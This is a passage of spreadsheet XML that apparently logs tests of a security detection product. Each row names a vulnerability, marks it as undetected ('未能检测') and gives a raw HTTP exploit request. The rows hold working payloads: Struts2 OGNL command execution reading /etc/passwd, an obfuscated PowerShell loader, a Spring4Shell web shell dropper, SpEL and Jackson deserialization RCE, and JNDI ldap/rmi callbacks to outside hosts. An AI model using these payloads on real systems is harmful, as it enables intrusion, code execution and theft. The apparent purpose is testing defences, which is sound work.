User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 135
Accept-Encoding: identity
Content-Type: application/json
{"@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": {"data_source": "ldap://192.168.1.11:1389/Exploit"}}</t>
        </is>
      </c>
      <c r="D32" s="0">
        <f>_xlfn.ENCODEURL(C32)</f>
        <v/>
      </c>
    </row>
    <row r="33" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A33" s="2" t="inlineStr">
        <is>
          <t>Jetty WEB-INF 敏感信息泄露</t>
        </is>
      </c>
      <c r="B33" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C33" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /%25u002e/WEB-INF/web.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D33" s="0">
        <f>_xlfn.ENCODEURL(C33)</f>
        <v/>
      </c>
    </row>
    <row r="34" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A34" s="2" t="inlineStr">
        <is>
          <t>Weblogic远程代码执行(CVE-2018-2893)</t>
        </is>
      </c>
      <c r="B34" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C34" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
</t>
        </is>
      </c>
      <c r="D34" s="0">
        <f>_xlfn.ENCODEURL(C34)</f>
        <v/>
      </c>
    </row>
    <row r="35" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A35" s="2" t="inlineStr">
        <is>
          <t>Aapache Tomcat AJP 文件包含漏洞利用</t>
        </is>
      </c>
      <c r="B35" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C35" s="0" t="inlineStr">
        <is>
          <t>_x0012_4_x0001__x0002__x0002__x0008_HTTP/1.1_x0005_/asdf_x000F_192.168.248.133_x000F_192.168.248.133P	_x0006_
keep-alive_x000F_Accept-Language_x000E_en-US,en;q=0.5_x0008__x0001_0_x000F_Accept-Encoding_x0013_gzip, deflate, sdch
Cache-Control	max-age=0_x000E_ Mozilla_x0019_Upgrade-Insecure-Requests_x0001_1_x0001_	text/html_x000B__x000F_192.168.248.133
!javax.servlet.include.request_uri_x0001_/
_x001F_javax.servlet.include.path_info_x000F_WEB-INF/web.xml
"javax.servlet.include.servlet_path_x0001_/</t>
        </is>
      </c>
      <c r="D35" s="0">
        <f>_xlfn.ENCODEURL(C35)</f>
        <v/>
      </c>
    </row>
    <row r="36" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A36" s="2" t="inlineStr">
        <is>
          <t>Jackson-databind 反序列化漏洞利用_1</t>
        </is>
      </c>
      <c r="B36" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C36" s="0" t="inlineStr">
        <is>
          <t>POST /exploit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 1298
Accept-Encoding: identity
Content-Type: application/json
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}</t>
        </is>
      </c>
      <c r="D36" s="0">
        <f>_xlfn.ENCODEURL(C36)</f>
        <v/>
      </c>
    </row>
    <row r="37" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A37" s="2" t="inlineStr">
        <is>
          <t>Tomcat PUT任意文件上传_1</t>
        </is>
      </c>
      <c r="B37" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C37" s="0" t="inlineStr">
        <is>
          <t>PUT /test1.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 11
Accept-Encoding: identity
Content-Type: text/plain
test put111</t>
        </is>
      </c>
      <c r="D37" s="0">
        <f>_xlfn.ENCODEURL(C37)</f>
        <v/>
      </c>
    </row>
    <row r="38" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A38" s="2" t="inlineStr">
        <is>
          <t>S2-037 远程代码执行_1(CVE-2016-4438)</t>
        </is>
      </c>
      <c r="B38" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C38" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /orders/4/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;content=16456&amp;command=cat+/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D38" s="0">
        <f>_xlfn.ENCODEURL(C38)</f>
        <v/>
      </c>
    </row>
    <row r="39" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A39" s="2" t="inlineStr">
        <is>
          <t>S2-033 远程代码执行_1(CVE-2016-3087)</t>
        </is>
      </c>
      <c r="B39" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C39" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;content=2908&amp;command=cat%20/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D39" s="0">
        <f>_xlfn.ENCODEURL(C39)</f>
        <v/>
      </c>
    </row>
    <row r="40" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A40" s="2" t="inlineStr">
        <is>
          <t>Spring Messaging 远程命令执行</t>
        </is>
      </c>
      <c r="B40" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C40" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /gs-guide-websocket/881/vfwndejq/websocket HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Selector: T(java.lang.Runtime).getRuntime().exec('whoami')
</t>
        </is>
      </c>
      <c r="D40" s="0">
        <f>_xlfn.ENCODEURL(C40)</f>
        <v/>
      </c>
    </row>
    <row r="41" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A41" s="2" t="inlineStr">
        <is>
          <t>Weblogic远程命令执行(CVE-2018-3245)</t>
        </is>
      </c>
      <c r="B41" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C41" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7002
</t>
        </is>
      </c>
      <c r="D41" s="0">
        <f>_xlfn.ENCODEURL(C41)</f>
        <v/>
      </c>
    </row>
    <row r="42" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A42" s="2" t="inlineStr">
        <is>
          <t>Spring Framework远程代码执行</t>
        </is>
      </c>
      <c r="B42" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C42" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D42" s="0">
        <f>_xlfn.ENCODEURL(C42)</f>
        <v/>
      </c>
    </row>
    <row r="43" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A43" s="2" t="inlineStr">
        <is>
          <t>Weblogic远程命令执行(CVE-2015-4852)</t>
        </is>
      </c>
      <c r="B43" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C43" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">t3 10.3.6
AS:255
HL:19
</t>
        </is>
      </c>
      <c r="D43" s="0">
        <f>_xlfn.ENCODEURL(C43)</f>
        <v/>
      </c>
    </row>
    <row r="44" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A44" s="2" t="inlineStr">
        <is>
          <t>Jackson-databind 反序列化漏洞利用_2</t>
        </is>
      </c>
      <c r="B44" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C44" s="0" t="inlineStr">
        <is>
          <t>POST /exploit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 1298
Accept-Encoding: identity
Content-Type: application/json
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}</t>
        </is>
      </c>
      <c r="D44" s="0">
        <f>_xlfn.ENCODEURL(C44)</f>
        <v/>
      </c>
    </row>
    <row r="45" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A45" s="2" t="inlineStr">
        <is>
          <t>Jetty 通用 Servlets 组件 ConcatServlet 信息泄露</t>
        </is>
      </c>
      <c r="B45" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C45" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /static?/%2557EB-INF/web.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D45" s="0">
        <f>_xlfn.ENCODEURL(C45)</f>
        <v/>
      </c>
    </row>
    <row r="46" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A46" s="2" t="inlineStr">
        <is>
          <t>Ruby on Rails 路径穿越与任意文件读取_1</t>
        </is>
      </c>
      <c r="B46" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C46" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /robots HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D46" s="0">
        <f>_xlfn.ENCODEURL(C46)</f>
        <v/>
      </c>
    </row>
    <row r="47" ht="18" customHeight="1" s="6" thickBot="1">
      <c r="A47" s="2" t="inlineStr">
        <is>
          <t>Weblogic远程命令执行(CVE-2020-2551)</t>
        </is>
      </c>
      <c r="B47" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C47" s="0" t="inlineStr">
        <is>
          <t>GIOP_x0001__x0002__x0005__x0002__x0003_xBEA_x0008__x0001__x0003__x000C_AdminServer3IDL:weblogic/corba/cos/naming/NamingContextAny:1.0_x0002_8_x0001_BEA*_x0010_s_x0003_th_x0005_ᑀ_x000B_rebind_any_x0006__x0005__x0018__x0001_
127.0.0.1&amp;_x0001__x000C__x0001_ _x0005__x0001__x0001__x0006_(IDL:omg.org/SendingContext/CodeBase:1.0_x0001__x0001__x0002_
127.0.0.1&amp;dBEA_x0008__x0001__x0003__x0001_(IDL:omg.org/SendingContext/CodeBase:1.0_x0003_12_x0001_BEA*_x0010_Գ
_x0001__x0001_,_x0001_ _x0003__x0001_ _x0001__x0001__x0005__x0001__x0001__x0001__x0001__x0003__x0001__x0001__x0001__x0001_	_x0005__x0001__x0001__x000F_ _x0001__x0001_BEA_x0003__x0014__x0005_ᑀBEA_x0004_
_x0003__x0006__x0001__x0013_Y4er545437464632254_x0001__x001D__x001C__x0001__x0001__x0002_&gt;RMI:weblogic.iiop.ProxyDesc:73CD9A45CBA52938:74261801B931EF00_x0002_YRMI:sun.reflect.annotation.AnnotationInvocationHandler:C003BED76E3338BB:55CAF50F15CB7EA5
8RMI:java.util.HashMap:86573568A211C011:0507DAC1C31660D1_x0015__x0001__x0001_?@_x000C__x0010__x0001_
#IDL:omg.org/CORBA/WStringValue:1.0_x0018__x0014_pwned545437459779884_x0001_
tRMI:com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager:0D3048E07B1D3B7B:4EF3ECFBB628982F_x001C__x0001__x0001__x0001__x0001__x0001_
_x000C_ _x001C_rmi://121.36.44.128:7000/exp_x0002_@RMI:javax.rmi.CORBA.ClassDesc:2BABDA04587ADCCC:CFBF02CF5294176B_x0002__x0002_'RMI:java.lang.Override:0000000000000000_x0002_9RMI:[Ljava.lang.Class;:071DA8BE7F971128:2C7E5503D9BF9553_x0001__x0002_$`_x0002_쀀$RMI:java.rmi.Remote:0000000000000000</t>
        </is>
      </c>
      <c r="D47" s="0">
        <f>_xlfn.ENCODEURL(C47)</f>
        <v/>
      </c>
    </row>
    <row r="48" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A48" s="2" t="inlineStr">
        <is>
          <t>JBoss 5.x6.x 反序列化漏洞利用</t>
        </is>
      </c>
      <c r="B48" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C48" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /jbossmq-httpil/HTTPServerILServlet HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D48" s="0">
        <f>_xlfn.ENCODEURL(C48)</f>
        <v/>
      </c>
    </row>
    <row r="49" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A49" s="2" t="inlineStr">
        <is>
          <t>ffmpeg 任意文件读取_1</t>
        </is>
      </c>
      <c r="B49" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C49" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /back.txt HTTP/1.1
User-Agent: Lavf/56.40.101
Accept: */*
Range: bytes=0-
Connection: close
Host: 10.82.200.214:8080
Icy-MetaData: 1
</t>
        </is>
      </c>
      <c r="D49" s="0">
        <f>_xlfn.ENCODEURL(C49)</f>
        <v/>
      </c>
    </row>
    <row r="50" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A50" s="2" t="inlineStr">
        <is>
          <t>S2-057 远程命令执行_2</t>
        </is>
      </c>
      <c r="B50" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C50" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /$%7b(%23_memberAccess[%27allowStaticMethodAccess%27]=true).(%23p=new%20java.lang.ProcessBuilder(%7b%27cmd.exe%27,%27/c%27,%27powershell.exe%20-nop%20-w%20hidden%20-noni%20-ep%20bypass%20%22&amp;([scriptblock]::create((New-Object%20System.IO.StreamReader(New-Object%20System.IO.Compression.GzipStream((New-Object%20System.IO.MemoryStream(,[System.Convert]::FromBase64String(((%27H4sIAPfoH2MCA5VVXW8aORR951dcoelmRgEL2KrqRkpVOk1XkbIt6mQ3DwgpxnMJszE2a3sCKOG/157xfBASbesHGPteHx+fe2wvcsFMJgX8iaZ/g3PGMxQGOo8dsC3YMDiHr7jpf5v/i8xA/3q3xq90%7b1%7dXbQEJsfF/lVMvlb42dc0JybWGFqIxnl2kIERuVYZ02U3O7Isww73%27+%27%7b1%7dqpcjv7zq%27+%27KiuJYbVLZn2UERn1BFV2H5PU2MysTdLIjlakVF2jscTTRnUjwb/Cw3gkuaFqORx1SSodbgBVjJNOfoCH4MIy%7b1%7dTsgWE1TLQx/+gO89E2o2KYDmvmMszbVCgspOnyc5+r4%7b1%7dTLZHsHo0m12x95TNmb207nki0ocq4df3KRdSX6LyVN2YM18YCluUISyr71+gqfECl8Z%7b1%7dxDd0q+UvM44lfqDv8%27+%27Y0SG796T0dv3ZPj7qNt%27+%27zO/HLd0oJtVFIV45vCU+s1ZJizPJsGJYVKgk6t3R9QVr0tOZJBfYKQ2S5ysyOJFVq6NfvBQtr%27+%27K+yFj8G1Rd%27+%279Dn2qYHsz5jitpMEZlskXGqMF/KM9S6rwXU87nlN3PougFOmScm6Uzrps01q9qE4ic817XcD10vYJQG68WqtloW8npfGdwOpsF7t9ZckDI%27+%27aG%27+%27Db05vHwd6LjSKtwuHU4NYQFEymzu9nZ+MkvryMXAE+uZywe2ONKzcaJu5oJUvkHFQu%7b1%7dM0GK0+urXm7cAoBiocz1xPu6J/aMVupOsDkap2bJngrYrneqexuaSCMI/grY0pquTAQS7WWqlCUwNgt5pI0KLTYD5iSW3ErvC29HOTG1gbDZmO9Qa/pkCsUd2bZ9lF1qNtOOjLSr6k0PZ3BlYV0svgLgdQ8f51rNeuLVBeULS3nE%7b1%7dQyUV84TVZD27Xw4J6OSLXb8kqrkKKnS/Eg77F/sV1bbbXVu0bZty21WWYcwzDICteVm/iONA1Lj/Vg0IPggH0EfYEwOJL0wumH6bXV8rUn%27+%27w59Tl0IKjS+85g2KPW3UUWm%7b1%7d+eui2F0lKgRZ9Kya9nC6Y%7b1%7d7tG/rV1VeCjz78NoQn+JabfokK3jwHUCMoBKmAT+FkksCJ/S/0v5Ks8HBEJtQsXfQDnDQgW0ckQK%27+%27Wkmg5mB4u1WBdxwj%7b1%7dSFUYvMT%7b1%7dvd+xR23aODfxT/m1g/texbcMe+bWa84Xnelm/%7b1%27+%27%7dv7i8Xd7zKVGv5/iOFZvVNswz%27+%27cO%27+%27VGLmuXiv/a51ZP/R17dwD+wOSdLPeqwgAAA%7b0%7d%7b0%7d%27)-f%27=%27,%27h%27)))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))%22%27%7d)).(%23p.redirectErrorStream(true)).(%23process=%23p.start()).(%23r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(%23process.getInputStream(),%23r)).(%23r.flush())%7d/showcase.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D50" s="0">
        <f>_xlfn.ENCODEURL(C50)</f>
        <v/>
      </c>
    </row>
    <row r="51" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A51" s="2" t="inlineStr">
        <is>
          <t>Spring Data Commons 远程命令执行(CVE-2018-1273)</t>
        </is>
      </c>
      <c r="B51" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C51" s="0" t="inlineStr">
        <is>
          <t>POST /users?page&amp;size=5 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch+/tmp/success")]=&amp;password=&amp;repeatedPassword=</t>
        </is>
      </c>
      <c r="D51" s="0">
        <f>_xlfn.ENCODEURL(C51)</f>
        <v/>
      </c>
    </row>
    <row r="52" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A52" s="2" t="inlineStr">
        <is>
          <t>S2-045远程代码执行_2</t>
        </is>
      </c>
      <c r="B52" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C52" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo pwn^test123 pwn$1test123').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
</t>
        </is>
      </c>
      <c r="D52" s="0">
        <f>_xlfn.ENCODEURL(C52)</f>
        <v/>
      </c>
    </row>
    <row r="53" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A53" s="2" t="inlineStr">
        <is>
          <t>Spring Cloud Function SpEL 远程代码执行</t>
        </is>
      </c>
      <c r="B53" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C53" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /functionRouter HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Spring.cloud.function.routing-Expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/RCE")
</t>
        </is>
      </c>
      <c r="D53" s="0">
        <f>_xlfn.ENCODEURL(C53)</f>
        <v/>
      </c>
    </row>
    <row r="54" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A54" s="2" t="inlineStr">
        <is>
          <t>WebLogic代码执行_2（CVE-2020-14882）</t>
        </is>
      </c>
      <c r="B54" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C54" s="0" t="inlineStr">
        <is>
          <t>POST /console/css/.%252e/console.portal HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 6684
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
